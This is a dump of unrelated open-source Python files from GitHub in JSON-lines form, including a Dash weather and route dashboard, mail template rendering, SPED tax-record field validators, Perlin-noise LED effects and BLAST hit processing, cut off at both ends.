style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-wind_mph', style=css_h2_pattern),\n html.H4('Velocidade do Vento (mph)', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n dbc.Row([\n dbc.Col([\n dbc.Card([\n html.H2(id=f'{id_prefix}-is_day', style=css_h2_pattern),\n html.H4('Dia ou Noite', style=css_h4_pattern)\n ], body=True, style=css_card_pattern),\n ], style={'flex': '1'}),\n ], style={'flex': '1'}, className='g-0'),\n], style={'backgroundColor': 'white', 'height': '100%', 'display': 'flex', 'flexDirection': 'column'})\n\nfirst_location_layout = create_location_layout('first', df_routes['origin'][0], css_h2_pattern=css_dict_h2, css_h4_pattern=css_dict_h4,css_card_pattern=css_dict_card)\nsecond_location_layout = create_location_layout('second', df_routes['origin'][1] if len(df_routes['origin'].unique()) > 1 else None, css_h2_pattern=css_dict_h2, css_h4_pattern=css_dict_h4,css_card_pattern=css_dict_card)\n\nlayout = dbc.Container(fluid=True, children=[\n dbc.Row([\n dbc.Col([\n dbc.Card([\n dbc.CardBody([ \n dbc.Col(children=[\n html.H1([html.Strong(\"Guia de Viagens\")]),\n dbc.Card([\n dbc.CardBody([\n html.H4(html.Strong('Informações da rota:')),\n html.Br(),\n html.P('Origem: ', id='new-origin'),\n html.P('Destino: ', id='new-destination'),\n html.P('Distância: ', id='new-distance'),\n html.P('Tempo estimado: ', id='new-trip_long'),\n ], style={'marginTop': '20px', 'backgroundColor': 'white'})\n ]),\n html.Img(id='new-weather-icon',src='/assets/logo.svg', height='100%', className='clickable-logo', style={'margin-top': '20px'}),\n ])\n ])\n ])\n ], md=2), \n dbc.Col([\n first_location_layout\n ], md=5),\n dbc.Col([\n second_location_layout\n ], md=5)\n ])\n])\n\n\n# Callback to update the options of the second dropdown\n@dash.callback(\n Output('second-location-dropdown', 'options'),\n [Input('first-location-dropdown', 'value')]\n)\ndef update_second_dropdown(selected_location):\n options = [{'label': origin, 'value': origin} for origin in df_routes['origin'].unique() if origin != selected_location]\n return options\n\n@dash.callback(\n Output('first-location-name', 'children'),\n [Input('first-location-dropdown', 'value')]\n)\ndef update_location_name(value):\n return value\n\n@dash.callback(\n Output('second-location-name', 'children'),\n [Input('second-location-dropdown', 'value')]\n)\ndef update_location_name(value):\n return value\n\n\n@dash.callback(\n [Output('first-precip_mm', 'children'),\n Output('first-humidity', 'children'),\n Output('first-condition', 'children'),\n Output('first-wind_mph', 'children'),\n Output('first-is_day', 'children')],\n [Input('first-location-dropdown', 'value')]\n)\ndef update_first_location_info(selected_location):\n \n selected_row = df_temp[df_temp['name'] == selected_location].sort_values('created_at', ascending=False).iloc[0]\n \n precip_mm = [html.Strong(selected_row['precip_mm'])]\n humidity = [html.Strong(selected_row['humidity'])]\n condition = [html.Strong(selected_row['condition'])]\n wind_mph = [html.Strong(selected_row['wind_mph'])]\n is_day = [html.Strong('Dia' if selected_row['is_day'] else 'Noite')]\n \n return precip_mm, humidity, condition, wind_mph, is_day\n \n \n@dash.callback(\n [Output('second-precip_mm', 'children'),\n Output('second-humidity', 'children'),\n Output('second-condition', 'children'),\n Output('second-wind_mph', 'children'),\n Output('second-is_day', 'children')],\n [Input('second-location-dropdown', 'value')]\n)\ndef update_first_location_info(selected_location):\n \n selected_row = df_temp[df_temp['name'] == selected_location].sort_values('created_at', ascending=False).iloc[0]\n \n precip_mm = [html.Strong(selected_row['precip_mm'])]\n humidity = [html.Strong(selected_row['humidity'])]\n condition = [html.Strong(selected_row['condition'])]\n wind_mph = [html.Strong(selected_row['wind_mph'])]\n is_day = [html.Strong('Dia' if selected_row['is_day'] else 'Noite')]\n \n return precip_mm, humidity, condition, wind_mph, is_day\n \n \n@dash.callback(\n [Output('new-origin', 'children'),\n Output('new-destination', 'children'),\n Output('new-distance', 'children'),\n Output('new-trip_long', 'children')],\n [Input('first-location-dropdown', 'value'),\n Input('second-location-dropdown', 'value')]\n)\ndef update_trip_info(origin, destination):\n \n if origin == destination:\n return [\"Origem: \", \"Destino: \", \"Distância: \", \"Tempo estimado: \"]\n \n selected_row = df_routes[(df_routes['origin'] == origin) & (df_routes['destination'] == destination)].sort_values('created_at', ascending=False).iloc[0]\n origin_info = [\"Origem: \", html.Strong(selected_row['origin'])]\n destination_info = [\"Destino: \", html.Strong(selected_row['destination'])]\n distance_info = [\"Distância: \", html.Strong(selected_row['distance'])]\n trip_long_info = [\"Tempo estimado: \", html.Strong(selected_row['trip_long'])]\n \n return origin_info, destination_info, distance_info, trip_long_info","repo_name":"samurai-py/zebrinha-azul-dash-data-app","sub_path":"pages/trips.py","file_name":"trips.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15189191605","text":"from krpsim_tool_verif import Setting, Config_structure, Env\nfrom krpsim_error import ErrorOutput, CustomError\n\n\ndef get_action(action):\n tab = action.split(':')\n if len(tab) != 2:\n raise ErrorOutput(\"KRP Error: Bad output from the KRP_SIM trace\")\n try:\n cycle = int(tab[0])\n except Exception:\n raise ErrorOutput(\"KRP Error: Cycle should be a valid integer\")\n return cycle, tab[1]\n\n\ndef main():\n setting = Setting()\n config = Config_structure()\n config.stock = setting.stock\n config.process = setting.process\n\n env = Env(config)\n try:\n for action in setting.actions:\n cycle, name = get_action(action)\n if cycle < env.cycle:\n raise (ErrorOutput(\"Cycle problem in tracefile \"\n \"({} < {})\".format(cycle, env.cycle)))\n env.update_cycle(cycle)\n env.process(name)\n print(\"VERIFICATION OK\")\n except CustomError as err:\n print(err)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arobion/krp_sim","sub_path":"srcs/krpsim_verif.py","file_name":"krpsim_verif.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9460121130","text":"#!/usr/bin/env python\nimport csv\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\nfrom html.parser import HTMLParser\nfrom pathlib import Path\nfrom typing import DefaultDict, Dict, List, Optional, Sequence, Tuple\n\nimport click\nfrom jinja2 import Template\n\n\nclass HTMLCounter(HTMLParser):\n def __init__(self) -> None:\n super().__init__()\n self.count = 0\n\n def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:\n if tag == \"html\":\n self.count += 1\n\n\ndef load_template(tmpl_path: str) -> Template:\n with open(tmpl_path, \"r\", encoding=\"utf-8\") as input_tmpl:\n return Template(input_tmpl.read())\n\n\ndef render_all_content(\n template: Template,\n common_data: Dict[str, str],\n unique_data: Sequence[Dict[str, str]],\n separator: str,\n) -> Dict[str, str]:\n addr_to_content: Dict[str, str] = dict()\n mail_defdict: DefaultDict[str, int] = defaultdict(int)\n for data in unique_data:\n data.update(common_data)\n if separator:\n subject = separator.join([data[\"receiver_email\"], data[\"receiver_name\"]])\n else:\n subject = data[\"receiver_email\"]\n mail_defdict[subject] += 1\n # multi-mail\n if mail_defdict[subject] > 1:\n subject = \"{}__{:03n}\".format(subject, mail_defdict[subject])\n\n addr_to_content[subject] = template.render(**data)\n return addr_to_content\n\n\ndef export_mails(recv_to_mail: Dict[str, str], output_path: str) -> None:\n for receiver_mail, mail_content in recv_to_mail.items():\n parser = HTMLCounter()\n parser.feed(mail_content)\n if parser.count > 0:\n with open(\n output_path / Path(receiver_mail + \".html\"), \"w\", encoding=\"utf-8\"\n ) as output_html:\n output_html.write(mail_content)\n else:\n with open(\n output_path / Path(receiver_mail + \".txt\"), \"w\", encoding=\"utf-8\"\n ) as output_file:\n output_file.write(mail_content)\n\n\n@click.command()\n@click.argument(\"template_path\", type=click.Path(exists=True))\n@click.argument(\"receiver_data\", type=click.Path(exists=True))\n@click.option(\n \"--separator\",\n default=\"\",\n show_default=False,\n help=\"Separator used for subject suffix. It is disabled with empty string by default.\",\n)\n@click.option(\n \"--output_path\",\n type=click.Path(exists=False),\n default=\"mails_to_sent\",\n show_default=True,\n help=\"Output path of rendered mails\",\n)\n@click.option(\n \"--unique_csv\",\n type=click.Path(exists=True),\n help=\"Use CSV file to import unique data\",\n)\ndef main(\n template_path: str,\n receiver_data: str,\n separator: str,\n output_path: str,\n unique_csv: str,\n) -> None:\n \"\"\"\n Application entry point\n \"\"\"\n if not os.path.isdir(output_path):\n logging.info('Create directory \"%s\"', output_path)\n Path(output_path).mkdir(parents=True)\n\n if unique_csv:\n with open(receiver_data, \"r\", encoding=\"utf-8\") as input_file:\n data = json.load(input_file)\n common_data = data[\"common_data\"]\n\n with open(unique_csv, \"r\", encoding=\"utf-8-sig\") as input_file:\n unique_data = [row for row in csv.DictReader(input_file)]\n else:\n with open(receiver_data, \"r\", encoding=\"utf-8\") as input_file:\n data = json.load(input_file)\n common_data = data[\"common_data\"]\n unique_data = data[\"unique_data\"]\n\n template = load_template(template_path)\n recv_to_mail = render_all_content(template, common_data, unique_data, separator)\n export_mails(recv_to_mail, output_path)\n\n\n# pylint: disable=no-value-for-parameter\nif __name__ == \"__main__\":\n main()\n# pylint: enable=no-value-for-parameter\n","repo_name":"pycontw/mail_handler","sub_path":"mail_handler/render_mail.py","file_name":"render_mail.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"8054604133","text":"from math import sqrt\n\n\nclass Fitness:\n\n def __init__(self):\n pass\n\n avg_fitness = 0\n best_fitness = 0\n standard_deviation = 0\n fitness_threshold = 1.0\n\n @classmethod\n # Evaluate fitness for all phenotypes\n # Fitness array returned is a one-to-one mapping of the phenotypes array\n def evaluate_fitness_of_phenotypes(cls, phenotypes):\n\n phenotypes_fitness = []\n bit_vector_length = float(len(phenotypes[0].bit_vector))\n for phenotype in phenotypes:\n\n fitness = 0\n for bit in phenotype.bit_vector:\n fitness += bit\n\n fitness /= bit_vector_length\n phenotypes_fitness.append(fitness)\n\n return phenotypes_fitness\n\n @classmethod\n def check_for_solution(cls, fitnesses):\n for i in xrange(len(fitnesses)):\n if cls.fitness_threshold <= fitnesses[i]:\n return i\n\n return -1\n\n @classmethod\n def index_of_best_solution(cls, fitnesses):\n return fitnesses.index(max(fitnesses))\n\n @classmethod\n # Wrapper for calculating average and best\n def get_fitness_of_phenotypes(cls, phenotypes):\n\n # Determine fitness for phenotypes\n phenotypes_fitness = cls.evaluate_fitness_of_phenotypes(phenotypes)\n\n # Determine average fitness and best fitness\n best_fitness = 0\n total_fitness = 0\n\n for fitness in phenotypes_fitness:\n\n total_fitness += fitness\n\n if fitness > best_fitness:\n best_fitness = fitness\n\n cls.best_fitness = best_fitness\n cls.avg_fitness = (total_fitness / len(phenotypes_fitness))\n cls.standard_deviation = cls.evaluate_standard_deviation(phenotypes_fitness)\n\n return phenotypes_fitness\n\n @classmethod\n # Standard deviation of fitness\n def evaluate_standard_deviation(cls, phenotypes_fitness):\n avg_deviation = 0\n for fitness in phenotypes_fitness:\n avg_deviation += pow(fitness - cls.avg_fitness, 2)\n\n return sqrt(avg_deviation/len(phenotypes_fitness))\n","repo_name":"klizter/SubSym","sub_path":"src/fitness.py","file_name":"fitness.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13221916519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: surajgiri\nHW3 Problem 3\n\"\"\"\n\n\"\"\"\"\nPayoff Function for the \nEuropean Call Option\nEuropean Put Option\nStrike Price 100 $\nPlot Graph\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef EUPayoff(s, x, type, position):\n zero = np.zeros(len(s))\n if type == \"call\" and position == \"long\":\n option = np.maximum(s-x, zero)\n return option\n elif type == \"call\" and position == \"short\":\n option = np.minimum(x-s, zero)\n return option\n elif type == \"put\" and position == \"long\":\n option = np.maximum(x-s, zero)\n return option\n elif type == \"put\" and position == \"short\":\n option = np.minimum(s-x, zero)\n return option\n else:\n print(\"Invalid Option Input\")\n\nif __name__ == \"__main__\":\n s = np.arange(0, 150, 0.1)\n x = 100\n types = [\"call\",\"put\"]\n positions = [\"long\", \"short\"]\n\n i = 0\n for type in types:\n for position in positions:\n i = i + 1\n plt.subplots()\n plt.plot(s, EUPayoff(s, x, type, position))\n plt.ylabel('Payoff')\n plt.xlabel('Price')\n plt.grid()\n plt.title(position + ' ' + type + ' option')\n plt.legend()\n plt.show()","repo_name":"surajgiri7/Stochastic_Methods_Lab","sub_path":"HW03_2022_09_27/hw3p3.py","file_name":"hw3p3.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11333138476","text":"import numpy as np\nfrom noise import snoise3\n\nimport effects as ef\n\nimport colorsys\n\n\n# set hue2 to None for white mode\n# Use an empty list if beats is None\nclass TransitionPerlinNoiseEffect(ef.Effect):\n def __init__(self, constellation, start_time, duration, saturation, layer, scale, speed, noise_dim, hue_list,\n hue_times):\n super().__init__(start_time, duration)\n self.constellation = constellation\n self.start_time = start_time\n self.duration = duration\n self.end_time = start_time + duration\n self.saturation = saturation\n self.layer = layer\n self.noise_gen = PerlinNoiseGenerator(*noise_dim, scale)\n self.speed = speed # Store the initial speed\n self.noise_dim = noise_dim # (width, height)\n self.hue_list = hue_list # list of hues to use (e.g. [0, 0.5, 1])\n self.hue_times = hue_times # start transition times between hues (e.g. [0, 20.23, 50.5])\n self.hue_transition_time = 3 # time to transition between hues in seconds\n\n def run(self, current_song_time):\n if not self.is_done(current_song_time):\n self.perlin_noise_effect(self.constellation, current_song_time)\n return True\n else:\n return False\n\n def is_done(self, current_song_time):\n if current_song_time >= self.end_time:\n return True\n\n def map_coord_to_noise(self, coord, max_coord):\n # Map LED's centroid coordinates to noise array coordinates\n return int(\n (coord + max_coord) / (2 * max_coord) * self.noise_dim[0]) # assuming x and y dimensions are the same\n\n def perlin_noise_effect(self, constellation, current_song_time):\n current_speed = self.speed\n noise_array = self.noise_gen.generate_perlin_noise(current_speed)\n\n for led in constellation.leds:\n x = self.map_coord_to_noise(led.xCoord_centroid, 950)\n y = self.map_coord_to_noise(led.yCoord_centroid, 615)\n\n hue = noise_array[y, x]\n color_int = self.get_color(hue, current_song_time)\n led.set_color(color_int)\n\n def get_color(self, hue, current_song_time):\n # Determine the interpolated hue based on the current song time and the transition time\n interpolated_hue = self.get_interpolated_hue(current_song_time)\n\n remapped_value = color_remap(hue, a=10, b=0.4) # remap to make it more or less white\n saturation_value = remapped_value * self.saturation\n\n # Interpolate between white and the current hue based on the remapped value\n hsv_color = (interpolated_hue, saturation_value, 1)\n color_rgb = colorsys.hsv_to_rgb(*hsv_color)\n color_int = [int(c * 255) for c in color_rgb]\n\n return color_int\n\n def get_interpolated_hue(self, current_song_time):\n\n for idx, hue_time in enumerate(self.hue_times):\n # If we are before the first hue_time\n if current_song_time < self.hue_times[0]:\n return self.hue_list[0]\n\n # Check if we are between two hue_times\n if idx < len(self.hue_times) - 1 and hue_time <= current_song_time < hue_time + self.hue_transition_time:\n hue1 = self.hue_list[idx]\n hue2 = self.hue_list[idx + 1]\n\n # Calculate how far we are into the transition\n ratio = (current_song_time - hue_time) / self.hue_transition_time\n\n # Interpolate between the two hues\n return (1 - ratio) * hue1 + ratio * hue2\n\n # If we are between two transition periods\n elif idx < len(self.hue_times) - 1 and hue_time + self.hue_transition_time <= current_song_time < \\\n self.hue_times[idx + 1]:\n return self.hue_list[idx + 1]\n\n return self.hue_list[-1] # return the last hue if current_song_time is beyond all hue_times\n\n\nclass PerlinNoiseGenerator:\n def __init__(self, width, height, scale):\n self.width = width\n self.height = height\n self.scale = scale\n self.z = 0\n\n self.CLIPPING_THRESHOLD = 0.50\n\n def generate_perlin_noise(self, speed):\n noise_array = np.zeros((self.height, self.width))\n\n for y in range(self.height):\n for x in range(self.width):\n noise_value = snoise3(x / self.scale, y / self.scale, self.z, octaves=6, persistence=0.5,\n lacunarity=2.0)\n\n if noise_value > self.CLIPPING_THRESHOLD:\n noise_value = self.CLIPPING_THRESHOLD\n elif noise_value < -self.CLIPPING_THRESHOLD:\n noise_value = -self.CLIPPING_THRESHOLD\n\n # now scale to the range of 0 to 1\n noise_value = (noise_value + self.CLIPPING_THRESHOLD) / (2 * self.CLIPPING_THRESHOLD)\n # snosie3 returns a value between -1 and 1, but the vast majority of values are between -0.6 and 0.6\n noise_array[y][x] = noise_value\n\n self.z += speed\n return noise_array\n\n\ndef color_remap(x, a=10, b=0.4):\n \"\"\"A custom sigmoid function with adjustable center.\n\n :param x: The input value.\n :param a: The parameter that adjusts the steepness of the sigmoid.\n :param b: The parameter that adjusts the center of the sigmoid.\n :return: The output value between 0 and 1.\n \"\"\"\n return 1 / (1 + np.exp(-a * (x - b)))\n","repo_name":"KyleH57/FlaskLights","sub_path":"effects2/transition_perlin.py","file_name":"transition_perlin.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6397795473","text":"\r\n\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib import colors\r\nimport numpy as np\r\n\r\ndef draw_communities(G, membership, pos):\r\n \"\"\"Draws the nodes to a plot with assigned colors for each individual cluster\r\n Parameters\r\n \r\n G : networkx graph\r\n membership : list\r\n A list where the position is the student and the value at the position is the student club membership.\r\n E.g. `print(membership[8]) --> 1` means that student #8 is a member of club 1.\r\n pos : positioning as a networkx spring layout\r\n E.g. nx.spring_layout(G)\r\n \"\"\" \r\n fig, ax = plt.subplots(figsize=(16,9))\r\n \r\n # Convert membership list to a dict where key=club, value=list of students in club\r\n club_dict = defaultdict(list)\r\n for student, club in enumerate(membership):\r\n club_dict[club].append(student)\r\n \r\n # Normalize number of clubs for choosing a color\r\n norm = colors.Normalize(vmin=0, vmax=len(club_dict.keys()))\r\n \r\n for club, members in club_dict.items():\r\n nx.draw_networkx_nodes(G, pos,\r\n nodelist=members,\r\n node_color=cm.jet(norm(club)),\r\n node_size=500,\r\n alpha=0.8,\r\n ax=ax)\r\n\r\n # Draw edges (social connections) and show final plot\r\n plt.title(\"Zachary's Karate Club\")\r\n nx.draw_networkx_edges(G, pos, alpha=0.5, ax=ax)\r\n \r\ndef graph_to_edge_matrix(G):\r\n \"\"\"Convert a networkx graph into an edge matrix.\r\n See https://www.wikiwand.com/en/Incidence_matrix for a good explanation on edge matrices\r\n \r\n Parameters\r\n ----------\r\n G : networkx graph\r\n \"\"\"\r\n # Initialize edge matrix with zeros\r\n edge_mat = np.zeros((len(G), len(G)), dtype=int)\r\n\r\n # Loop to set 0 or 1 (diagonal elements are set to 1)\r\n for node in G:\r\n for neighbor in G.neighbors(node):\r\n edge_mat[node][neighbor] = 1\r\n edge_mat[node][node] = 0\r\n\r\n return edge_mat\r\n\r\ndef draw_true_vs_pred(G, y_true, y_pred, pos, algo_name, ax):\r\n \r\n for student, club in y_true.items():\r\n if y_pred is not None:\r\n if club == y_pred[student]:\r\n node_color = [0, 1, 0]\r\n node_shape = 'o'\r\n else:\r\n node_color = [0, 0, 0]\r\n node_shape = 'X'\r\n \r\n nx.draw_networkx_nodes(G, pos,\r\n nodelist=[student],\r\n node_color=node_color,\r\n node_size=250,\r\n alpha=0.7,\r\n ax=ax,\r\n node_shape=node_shape)\r\n \r\n # Draw edges and show final plot\r\n ax.set_title(algo_name)\r\n nx.draw_networkx_edges(G, pos, alpha=0.5, ax=ax)\r\n\r\n","repo_name":"phdinds-aim/alis","sub_path":"notebooks/social-network-graphs/community_functions.py","file_name":"community_functions.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30834156211","text":"# -*- coding: utf-8 -*-\n\n\nimport re\n\nfrom datetime import date\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom .erros import CampoFixoError\nfrom .erros import CampoObrigatorioError\nfrom .erros import FormatoInvalidoError\n\n\nclass Campo(object):\n \"\"\"\n Classe base para definição de um campo de um registro do SPED.\n\n >>> campo = Campo(1, 'TESTE', True)\n >>> campo\n \n >>> campo.indice\n 1\n >>> campo.nome\n 'TESTE'\n >>> campo.obrigatorio\n True\n \"\"\"\n def __init__(self, indice, nome, obrigatorio=False):\n self._indice = indice\n self._nome = nome\n self._obrigatorio = obrigatorio\n\n def __repr__(self):\n return '<%s.%s(%s, %s)>' % (self.__class__.__module__,\n self.__class__.__name__,\n self._indice, self._nome)\n\n @property\n def indice(self):\n return self._indice\n\n @property\n def nome(self):\n return self._nome\n\n @property\n def obrigatorio(self):\n return self._obrigatorio\n\n def get(self, registro):\n return registro.valores[self._indice] or None\n\n def set(self, registro, valor):\n if self._obrigatorio and not valor:\n raise CampoObrigatorioError(registro, self.nome)\n if not valor:\n registro.valores[self._indice] = ''\n return\n if valor and not self.__class__.validar(valor):\n raise FormatoInvalidoError(registro, self.nome)\n if not isinstance(valor, str):\n raise FormatoInvalidoError(registro, self.nome)\n registro.valores[self._indice] = valor or ''\n\n @staticmethod\n def validar(valor):\n return True\n\n\nclass CampoFixo(Campo):\n \"\"\"\n Classe base para definição de um campo de um registro do SPED.\n\n >>> campo = CampoFixo(1, 'REG', '0000')\n >>> campo\n \n >>> campo.indice\n 1\n >>> campo.nome\n 'REG'\n >>> campo.obrigatorio\n True\n >>> campo.valor\n '0000'\n \"\"\"\n def __init__(self, indice, nome, valor):\n super().__init__(indice, nome, True)\n self._valor = valor\n\n @property\n def valor(self):\n return self._valor\n\n def get(self, registro):\n return self._valor\n\n def set(self, registro, valor):\n if valor != self._valor:\n raise CampoFixoError(registro, self.nome)\n\n\nclass CampoAlfanumerico(Campo):\n def __init__(self, indice, nome, obrigatorio=False, tamanho=None):\n super().__init__(indice, nome, obrigatorio)\n self._tamanho = tamanho\n\n @property\n def tamanho(self):\n return self._tamanho\n\n def set(self, registro, valor):\n valor = valor or ''\n if self._tamanho is not None:\n valor = valor[:self._tamanho]\n super().set(registro, valor)\n\n\nclass CampoBool(Campo):\n def __init__(self, indice, nome, obrigatorio=False, valorVerdadeiro='S', valorFalso='N'):\n super().__init__(indice, nome, obrigatorio)\n self.valorVerdadeiro = valorVerdadeiro\n self.valorFalso = valorFalso\n\n def get(self, registro):\n valor = super().get(registro)\n if not valor:\n return None\n return valor == self.valorVerdadeiro\n\n def set(self, registro, valor):\n if isinstance(valor, bool):\n super().set(registro, self.valorVerdadeiro if valor else self.valorFalso)\n elif valor is None:\n super().set(registro, None)\n else:\n raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoNumerico(Campo):\n def __init__(self, indice, nome, obrigatorio=False,\n precisao=None, minimo=0, maximo=1000):\n super().__init__(indice, nome, obrigatorio)\n self._precisao = precisao if precisao is not None else 0\n self._minimo = minimo\n self._maximo = maximo\n\n @property\n def precisao(self):\n return self._precisao\n\n @property\n def minimo(self):\n return self._minimo\n\n @property\n def maximo(self):\n return self._maximo\n\n def get(self, registro):\n valor = super().get(registro)\n if not valor:\n return None\n return Decimal(valor.replace(',', '.'))\n\n def set(self, registro, valor):\n if isinstance(valor, str):\n valor = Decimal(valor.replace(',', '.'))\n\n if isinstance(valor, Decimal) or isinstance(valor, float):\n super().set(registro, (('%.' + str(self._precisao) + 'f') % valor).replace('.', ','))\n elif isinstance(valor, int):\n super().set(registro, str(valor))\n elif not valor:\n super().set(registro, '0')\n else:\n raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoData(Campo):\n def __init__(self, indice, nome, obrigatorio=False):\n super().__init__(indice, nome, obrigatorio)\n\n def get(self, registro):\n valor = super().get(registro)\n if not valor:\n return None\n return datetime.strptime(valor, '%d%m%Y').date()\n\n def set(self, registro, valor):\n if isinstance(valor, date):\n super().set(registro, valor.strftime('%d%m%Y'))\n elif not valor:\n super().set(registro, None)\n else:\n raise FormatoInvalidoError(registro, self.nome)\n\n\nclass CampoRegex(Campo):\n def __init__(self, indice, nome, obrigatorio=False, regex=None):\n super().__init__(indice, nome, obrigatorio)\n self._regex = re.compile('^' + regex + '$')\n\n def set(self, registro, valor):\n if not isinstance(valor, str):\n valor = str(valor)\n if not valor or self._regex.match(valor):\n super().set(registro, valor)\n else:\n raise FormatoInvalidoError(registro, str(self))\n\n # def __repr__(self):\n # return '' f'{self.__class__.__name__}({self.indice}, {self.nome}, {self._obrigatorio}, {self._regex})'\n\n\nclass CampoCNPJ(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) != 14:\n return False\n\n multiplicadores = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]\n\n cnpj = [int(c) for c in valor]\n\n soma1 = sum([cnpj[i] * multiplicadores[i+1] for i in range(12)])\n soma2 = sum([cnpj[i] * multiplicadores[i] for i in range(13)])\n digito1 = 11 - (soma1 % 11)\n digito2 = 11 - (soma2 % 11)\n\n if digito1 >= 10:\n digito1 = 0\n\n if digito2 >= 10:\n digito2 = 0\n\n if cnpj[12] != digito1 or cnpj[13] != digito2:\n return False\n\n return True\n\n\nclass CampoCPF(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) != 11:\n return False\n\n multiplicadores = [11, 10, 9, 8, 7, 6, 5, 4, 3, 2]\n\n cpf = [int(c) for c in valor]\n\n soma1 = sum([cpf[i] * multiplicadores[i+1] for i in range(9)])\n soma2 = sum([cpf[i] * multiplicadores[i] for i in range(10)])\n digito1 = 11 - (soma1 % 11)\n digito2 = 11 - (soma2 % 11)\n\n if digito1 >= 10:\n digito1 = 0\n\n if digito2 >= 10:\n digito2 = 0\n\n if cpf[9] != digito1 or cpf[10] != digito2:\n return False\n\n return True\n\n\nclass CampoCPFouCNPJ(Campo):\n @staticmethod\n def validar(valor):\n if len(valor) == 14:\n return CampoCNPJ.validar(valor)\n if len(valor) == 11:\n return CampoCPF.validar(valor)\n return False\n","repo_name":"sped-br/python-sped","sub_path":"sped/campos.py","file_name":"campos.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"pt","doc_type":"code","stars":42,"dataset":"github-code","pt":"67"} +{"seq_id":"73520727252","text":"from .faces import (\n # first, the classes\n Shape, Shape5p, Shape68p, Face, Atlas,\n # and now the functions\n detect, landmark, encode, compare, estimate_age, estimate_gender,\n normalize_landmark\n # and not much more for now\n)\n\nfrom . import align\n\nage_tags = [\n # the elements of the tuples are:\n # (lower age, higher age, description text)\n (-1, -1, \"none\"), # this one is a formality, it isn't used\n (0, 3, \"baby\"),\n (4, 9, \"child\"),\n (10, 13, \"preteen\"),\n (14, 17, \"teen\"),\n (18, 25, \"young\"),\n (26, 40, \"young adult\"),\n (41, 59, \"adult\"),\n (60, 99, \"elder\"),\n]\n","repo_name":"bconstanzo/phantom","sub_path":"phantom/faces/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"47680165608","text":"def scs(k):\n s = 0\n while k > 0:\n s += 1\n k //= 10\n return s\nn=int(input())\nt = 0\nfor x in range(1, n+1):\n t += scs(x)\nprint(t)\n","repo_name":"hoclentop/hoclentop.github.io","sub_path":"mau/2c275.py","file_name":"2c275.py","file_ext":"py","file_size_in_byte":154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29547023486","text":"\"\"\"Convert HSPs to hits.\"\"\"\n\nimport multiprocessing as mp\nimport os\nfrom itertools import groupby, permutations\n\nimport numpy as np\n\n\ndef parse_file(qspid, sspid):\n # Open files and process lines\n with open(f'../blast2hsps/out/hsps/{qspid}/{sspid}.tsv') as file:\n field_names = file.readline().rstrip('\\n').split('\\t')\n line2key = make_line2key(field_names)\n\n hits = []\n for _, group in groupby(file, line2key):\n hsps = []\n for line in group:\n hsp = {key: hsp_columns[key](value) for key, value in zip(field_names, line.rstrip('\\n').split('\\t'))}\n if hsp['compatible']: # Use compatible HSPs only (which pass the E-value cutoff)\n hsps.append(hsp)\n if hsps:\n hits.append(hsps2hit(hsps))\n\n # Write to file\n if not os.path.exists(f'out/{qspid}/'):\n os.makedirs(f'out/{qspid}/')\n\n with open(f'out/{qspid}/{sspid}.tsv', 'w') as file:\n file.write('\\t'.join(hit_columns) + '\\n')\n for hit in hits:\n file.write('\\t'.join([str(hit[column]) for column in hit_columns]) + '\\n')\n\n\ndef hsps2hit(hsps):\n # Calculate values from all HSPs\n hit = {key: hsps[0][key] for key in ['qppid', 'qgnid', 'sppid', 'sgnid', 'qlen', 'slen']}\n hit['chspnum'] = len(hsps)\n qcov = np.zeros((1, hsps[0]['qlen']), dtype=bool)\n scov = np.zeros((1, hsps[0]['slen']), dtype=bool)\n for hsp in hsps:\n qcov[0, hsp['qstart']-1:hsp['qend']] = True\n scov[0, hsp['sstart']-1:hsp['send']] = True\n hit['cnqa'] = qcov.sum()\n hit['cnsa'] = scov.sum()\n\n # Calculate values from disjoint HSPs only\n disjoint_hsps = [hsp for hsp in hsps if hsp['disjoint']]\n hit['hspnum'] = len(disjoint_hsps)\n hit['nqa'] = sum([hsp['qend'] - hsp['qstart'] + 1 for hsp in disjoint_hsps])\n hit['nsa'] = sum([hsp['send'] - hsp['sstart'] + 1 for hsp in disjoint_hsps])\n hit['bitscore'] = sum([hsp['bitscore'] for hsp in disjoint_hsps])\n\n return 